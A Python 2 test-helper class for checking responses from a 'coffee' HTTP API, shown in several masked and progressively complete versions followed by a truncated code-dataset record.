if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
<|reserved_special_token_0|>
def _check_format(self, origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(expected_rsp
), """Length of dict is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}""".format(
origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(key
), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(
str(key))
logging.warning(
u'Check value for the same key: [{}] in origin_rsp and expected_rsp'
.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning(
"""Length of list is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
assert len(origin_rsp) == len(expected_rsp
), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)
) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,
unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
"""Check format fail!!!! We get different value here!!
origin_rsp:
{}
but we expect to see in expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
<|reserved_special_token_0|>
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
def check_rsp(self, origin_rsp, expected_rsp, check_format=False,
check_partial_rsp=False, check_length=False,
check_format_ignore_list_length=False, check_format_null_str=False):
if check_format:
logging.warning(
'Now start to check format for origin_rsp and expected_rsp!')
self._check_format(origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str)
if check_partial_rsp:
self._check_partial_rsp(expected_rsp, origin_rsp)
if check_length is not False:
for key, expected_length in check_length.iteritems():
current_length = len(origin_rsp[key])
assert expected_length == current_length, "We expect to see length of '{}' in origin_rsp is {}, but now it is {}".format(
key, expected_length, current_length)
if not any([check_format, check_partial_rsp, check_length]):
sorted_expected_rsp = self._order_json(expected_rsp)
sorted_origin_rsp = self._order_json(origin_rsp)
logging.warning('\nWe expect to see \n\n{}, \n\nand we get \n\n{}.'
.format(sorted_expected_rsp, sorted_origin_rsp))
assert sorted_expected_rsp == sorted_origin_rsp, "We don't get the expected,please check the log"
logging.warning('\x1b[0;32m check_rsp done!!! PASS\x1b[0m')
def _check_format(self, origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(expected_rsp
), """Length of dict is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}""".format(
origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(key
), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(
str(key))
logging.warning(
u'Check value for the same key: [{}] in origin_rsp and expected_rsp'
.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning(
"""Length of list is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
assert len(origin_rsp) == len(expected_rsp
), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)
) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,
unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
"""Check format fail!!!! We get different value here!!
origin_rsp:
{}
but we expect to see in expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
def _order_json(self, json_string):
"""
Return an ordered list for compare.
:param json_string: string in json format
:return: an ordered list
"""
if isinstance(json_string, dict):
return sorted((k, self._order_json(v)) for k, v in json_string.
items())
if isinstance(json_string, list):
return sorted(self._order_json(x) for x in json_string)
else:
return json_string
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
import requests
import logging
import json
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning(
'when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning(
"""
#####
get rsp from url:
{} is :
#####
{}
#####
text is:
{}
#####
"""
.format(url, repr(rsp), repr(rsp.text)))
return rsp
def check_rsp(self, origin_rsp, expected_rsp, check_format=False,
check_partial_rsp=False, check_length=False,
check_format_ignore_list_length=False, check_format_null_str=False):
if check_format:
logging.warning(
'Now start to check format for origin_rsp and expected_rsp!')
self._check_format(origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str)
if check_partial_rsp:
self._check_partial_rsp(expected_rsp, origin_rsp)
if check_length is not False:
for key, expected_length in check_length.iteritems():
current_length = len(origin_rsp[key])
assert expected_length == current_length, "We expect to see length of '{}' in origin_rsp is {}, but now it is {}".format(
key, expected_length, current_length)
if not any([check_format, check_partial_rsp, check_length]):
sorted_expected_rsp = self._order_json(expected_rsp)
sorted_origin_rsp = self._order_json(origin_rsp)
logging.warning('\nWe expect to see \n\n{}, \n\nand we get \n\n{}.'
.format(sorted_expected_rsp, sorted_origin_rsp))
assert sorted_expected_rsp == sorted_origin_rsp, "We don't get the expected,please check the log"
logging.warning('\x1b[0;32m check_rsp done!!! PASS\x1b[0m')
def _check_format(self, origin_rsp, expected_rsp,
check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(expected_rsp
), """Length of dict is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}""".format(
origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(key
), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(
str(key))
logging.warning(
u'Check value for the same key: [{}] in origin_rsp and expected_rsp'
.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning(
"""Length of list is not right! Please check the length.
origin_rsp:
{}
expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
assert len(origin_rsp) == len(expected_rsp
), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[
index], check_format_ignore_list_length,
check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)
) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,
unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
"""Check format fail!!!! We get different value here!!
origin_rsp:
{}
but we expect to see in expected_rsp:
{}"""
.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
def _order_json(self, json_string):
"""
Return an ordered list for compare.
:param json_string: string in json format
:return: an ordered list
"""
if isinstance(json_string, dict):
return sorted((k, self._order_json(v)) for k, v in json_string.
items())
if isinstance(json_string, list):
return sorted(self._order_json(x) for x in json_string)
else:
return json_string
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning(
'Start to check if expected_rsp: {} is part of origin_rsp: {}'.
format(exp, ori))
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, "key '{}' does not exist in original response.".format(
k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index
] in ori, 'exp: {} does not in ori: {}'.format(exp[
index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,
ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(
subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(
subset_dict, whole_dict)
<|reserved_special_token_1|>
import requests
import logging
import json
class Handler(object):
def __init__(self):
"""
This class is used to handle interaction towards coffee interface.
"""
super(Handler, self).__init__()
logging.warning('Initializing coffeeHandler....')
# get an active token and get prepared for sending request
self.coffee_session = requests.session()
def get_rsp_from_url(self, url, params=None, method='get', data=None):
logging.warning('when using method {}, header is:\n {} \n data is: \n{}.\n'.
format(method, self.coffee_session.headers, data))
rsp = None
if 'get' == method:
rsp = self.coffee_session.get(url, params=params, timeout=10)
elif 'put' == method:
rsp = self.coffee_session.put(url, data=json.dumps(data))
elif 'post' == method:
rsp = self.coffee_session.post(url, data=json.dumps(data))
elif 'delete' == method:
rsp = self.coffee_session.delete(url, data=json.dumps(data))
else:
assert 0, 'We only support get/post/put/delete for now!!!'
logging.warning('\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n'.
format(url, repr(rsp), repr(rsp.text)))
return rsp
def check_rsp(self, origin_rsp, expected_rsp, check_format=False, check_partial_rsp=False, check_length=False,
check_format_ignore_list_length=False, check_format_null_str=False):
if check_format:
logging.warning('Now start to check format for origin_rsp and expected_rsp!')
self._check_format(origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str)
if check_partial_rsp:
self._check_partial_rsp(expected_rsp, origin_rsp)
if check_length is not False:
for key, expected_length in check_length.iteritems():
current_length = len(origin_rsp[key])
assert expected_length == current_length, \
'We expect to see length of \'{}\' in origin_rsp is {}, but now it is {}'.format(
key, expected_length, current_length)
if not any([check_format, check_partial_rsp, check_length]):
sorted_expected_rsp = self._order_json(expected_rsp)
sorted_origin_rsp = self._order_json(origin_rsp)
logging.warning('\nWe expect to see \n\n{}, \n\nand we get \n\n{}.'.format(sorted_expected_rsp,
sorted_origin_rsp))
assert sorted_expected_rsp == sorted_origin_rsp, \
'We don\'t get the expected,please check the log'
logging.warning('\033[0;32m check_rsp done!!! PASS\033[0m')
def _check_format(self, origin_rsp, expected_rsp, check_format_ignore_list_length, check_format_null_str):
logging.warning(u'now compare origin rsp: \n{}'.format(origin_rsp))
logging.warning(u'\nAnd expected_rsp: \n{}'.format(expected_rsp))
if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):
assert len(origin_rsp) == len(
expected_rsp), 'Length of dict is not right! Please check the length.\norigin_rsp: ' \
'\n{}\nexpected_rsp: \n{}'.format(origin_rsp, expected_rsp)
for key, value in origin_rsp.iteritems():
assert expected_rsp.get(
key), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(str(key))
logging.warning(u'Check value for the same key: [{}] in origin_rsp and expected_rsp'.format(key))
self._check_format(value, expected_rsp.get(key),
check_format_ignore_list_length, check_format_null_str)
elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):
if expected_rsp:
logging.warning('Length of list is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp:'
' \n{}'.format(origin_rsp, expected_rsp))
if check_format_ignore_list_length:
for index in xrange(len(expected_rsp)):
self._check_format(origin_rsp[index], expected_rsp[index],
check_format_ignore_list_length, check_format_null_str)
else:
assert len(origin_rsp) == len(
expected_rsp), 'Length of list is not right! Please check the length.'
for index in xrange(len(origin_rsp)):
self._check_format(origin_rsp[index], expected_rsp[index],
check_format_ignore_list_length, check_format_null_str)
else:
return True
elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):
return True
elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):
return True
elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)) and (
isinstance(expected_rsp, str) or isinstance(expected_rsp, unicode)):
return True
elif check_format_null_str:
if origin_rsp is None and isinstance(expected_rsp, str):
return True
if origin_rsp is None and isinstance(expected_rsp, int):
return True
else:
logging.warning(
'Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in '
'expected_rsp: \n{}'.format(origin_rsp, expected_rsp))
assert 0, 'Check format fail!!!! We get different value here!!'
def _order_json(self, json_string):
"""
Return an ordered list for compare.
:param json_string: string in json format
:return: an ordered list
"""
if isinstance(json_string, dict):
return sorted((k, self._order_json(v)) for k, v in json_string.items())
if isinstance(json_string, list):
return sorted(self._order_json(x) for x in json_string)
else:
return json_string
def _check_partial_rsp(self, exp, ori):
"""
Check partial rsp but not the while rsp.
:param exp: expected rsp
:param ori: origin rsp
:return: None
"""
logging.warning('Start to check if expected_rsp: {} is part of origin_rsp: {}'.format(exp, ori))
# so far, leaf node could be string or list which must be exactly the same
if isinstance(exp, dict):
for k, v in exp.iteritems():
if ori.get(k):
self._check_partial_rsp(exp[k], ori[k])
else:
assert 0, 'key \'{}\' does not exist in original response.'.format(k)
elif isinstance(exp, list):
for index in xrange(len(exp)):
if isinstance(exp[index], dict):
self._assert_dict_contain(exp[index], ori[index])
elif isinstance(exp[index], list):
self._check_partial_rsp(exp[index], ori[index])
else:
assert exp[index] in ori, 'exp: {} does not in ori: {}'.format(exp[index], ori)
else:
assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp, ori)
@staticmethod
def _assert_dict_contain(subset_dict, whole_dict):
logging.warning('subset_dict is {}, whole_dict is {}'.format(subset_dict, whole_dict))
for key in subset_dict:
if whole_dict.get(key):
continue
else:
assert 0, '{} should be subset of {}, but now it is not!!'.format(subset_dict, whole_dict)
|
flexible
|
{
"blob_id": "00228facd19c72bebd9afbbe52597e390233d41e",
"index": 5822,
"step-1": "<mask token>\n\n\nclass Handler(object):\n <mask token>\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n <mask token>\n <mask token>\n <mask token>\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-2": "<mask token>\n\n\nclass Handler(object):\n\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n <mask token>\n\n def _check_format(self, origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str):\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(expected_rsp\n ), \"\"\"Length of dict is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\".format(\n origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(key\n ), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(\n str(key))\n logging.warning(\n u'Check value for the same key: [{}] in origin_rsp and expected_rsp'\n .format(key))\n self._check_format(value, expected_rsp.get(key),\n check_format_ignore_list_length, check_format_null_str)\n elif isinstance(origin_rsp, list) and isinstance(expected_rsp, list):\n if expected_rsp:\n logging.warning(\n \"\"\"Length of list is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n if check_format_ignore_list_length:\n for index in xrange(len(expected_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n assert len(origin_rsp) == len(expected_rsp\n ), 'Length of list is not right! Please check the length.'\n for index in xrange(len(origin_rsp)):\n self._check_format(origin_rsp[index], expected_rsp[\n index], check_format_ignore_list_length,\n check_format_null_str)\n else:\n return True\n elif isinstance(origin_rsp, int) and isinstance(expected_rsp, int):\n return True\n elif isinstance(origin_rsp, float) and isinstance(expected_rsp, float):\n return True\n elif (isinstance(origin_rsp, str) or isinstance(origin_rsp, unicode)\n ) and (isinstance(expected_rsp, str) or isinstance(expected_rsp,\n unicode)):\n return True\n elif check_format_null_str:\n if origin_rsp is None and isinstance(expected_rsp, str):\n return True\n if origin_rsp is None and isinstance(expected_rsp, int):\n return True\n else:\n logging.warning(\n \"\"\"Check format fail!!!! We get different value here!!\norigin_rsp: \n{}\nbut we expect to see in expected_rsp: \n{}\"\"\"\n .format(origin_rsp, expected_rsp))\n assert 0, 'Check format fail!!!! We get different value here!!'\n <mask token>\n\n def _check_partial_rsp(self, exp, ori):\n \"\"\"\n Check partial rsp but not the while rsp.\n :param exp: expected rsp\n :param ori: origin rsp\n :return: None\n \"\"\"\n logging.warning(\n 'Start to check if expected_rsp: {} is part of origin_rsp: {}'.\n format(exp, ori))\n if isinstance(exp, dict):\n for k, v in exp.iteritems():\n if ori.get(k):\n self._check_partial_rsp(exp[k], ori[k])\n else:\n assert 0, \"key '{}' does not exist in original response.\".format(\n k)\n elif isinstance(exp, list):\n for index in xrange(len(exp)):\n if isinstance(exp[index], dict):\n self._assert_dict_contain(exp[index], ori[index])\n elif isinstance(exp[index], list):\n self._check_partial_rsp(exp[index], ori[index])\n else:\n assert exp[index\n ] in ori, 'exp: {} does not in ori: {}'.format(exp[\n index], ori)\n else:\n assert exp == ori, 'exp: {} does not equal to ori: {}'.format(exp,\n ori)\n\n @staticmethod\n def _assert_dict_contain(subset_dict, whole_dict):\n logging.warning('subset_dict is {}, whole_dict is {}'.format(\n subset_dict, whole_dict))\n for key in subset_dict:\n if whole_dict.get(key):\n continue\n else:\n assert 0, '{} should be subset of {}, but now it is not!!'.format(\n subset_dict, whole_dict)\n",
"step-3": "<mask token>\n\n\nclass Handler(object):\n\n def __init__(self):\n \"\"\"\n This class is used to handle interaction towards coffee interface.\n \"\"\"\n super(Handler, self).__init__()\n logging.warning('Initializing coffeeHandler....')\n self.coffee_session = requests.session()\n\n def get_rsp_from_url(self, url, params=None, method='get', data=None):\n logging.warning(\n 'when using method {}, header is:\\n {} \\n data is: \\n{}.\\n'.\n format(method, self.coffee_session.headers, data))\n rsp = None\n if 'get' == method:\n rsp = self.coffee_session.get(url, params=params, timeout=10)\n elif 'put' == method:\n rsp = self.coffee_session.put(url, data=json.dumps(data))\n elif 'post' == method:\n rsp = self.coffee_session.post(url, data=json.dumps(data))\n elif 'delete' == method:\n rsp = self.coffee_session.delete(url, data=json.dumps(data))\n else:\n assert 0, 'We only support get/post/put/delete for now!!!'\n logging.warning(\n \"\"\"\n\n#####\nget rsp from url: \n{} is :\n##### \n{}\n#####\n\ntext is: \n{}\n#####\n\"\"\"\n .format(url, repr(rsp), repr(rsp.text)))\n return rsp\n\n def check_rsp(self, origin_rsp, expected_rsp, check_format=False,\n check_partial_rsp=False, check_length=False,\n check_format_ignore_list_length=False, check_format_null_str=False):\n if check_format:\n logging.warning(\n 'Now start to check format for origin_rsp and expected_rsp!')\n self._check_format(origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str)\n if check_partial_rsp:\n self._check_partial_rsp(expected_rsp, origin_rsp)\n if check_length is not False:\n for key, expected_length in check_length.iteritems():\n current_length = len(origin_rsp[key])\n assert expected_length == current_length, \"We expect to see length of '{}' in origin_rsp is {}, but now it is {}\".format(\n key, expected_length, current_length)\n if not any([check_format, check_partial_rsp, check_length]):\n sorted_expected_rsp = self._order_json(expected_rsp)\n sorted_origin_rsp = self._order_json(origin_rsp)\n logging.warning('\\nWe expect to see \\n\\n{}, \\n\\nand we get \\n\\n{}.'\n .format(sorted_expected_rsp, sorted_origin_rsp))\n assert sorted_expected_rsp == sorted_origin_rsp, \"We don't get the expected,please check the log\"\n logging.warning('\\x1b[0;32m check_rsp done!!! PASS\\x1b[0m')\n\n def _check_format(self, origin_rsp, expected_rsp,\n check_format_ignore_list_length, check_format_null_str):\n logging.warning(u'now compare origin rsp: \\n{}'.format(origin_rsp))\n logging.warning(u'\\nAnd expected_rsp: \\n{}'.format(expected_rsp))\n if isinstance(origin_rsp, dict) and isinstance(expected_rsp, dict):\n assert len(origin_rsp) == len(expected_rsp\n ), \"\"\"Length of dict is not right! Please check the length.\norigin_rsp: \n{}\nexpected_rsp: \n{}\"\"\".format(\n origin_rsp, expected_rsp)\n for key, value in origin_rsp.iteritems():\n assert expected_rsp.get(key\n ), 'In expected_rsp, there is no key: {} while there is in origin_rsp'.format(\n str(key))\n logging.warning(\n u'Check value for the same key: 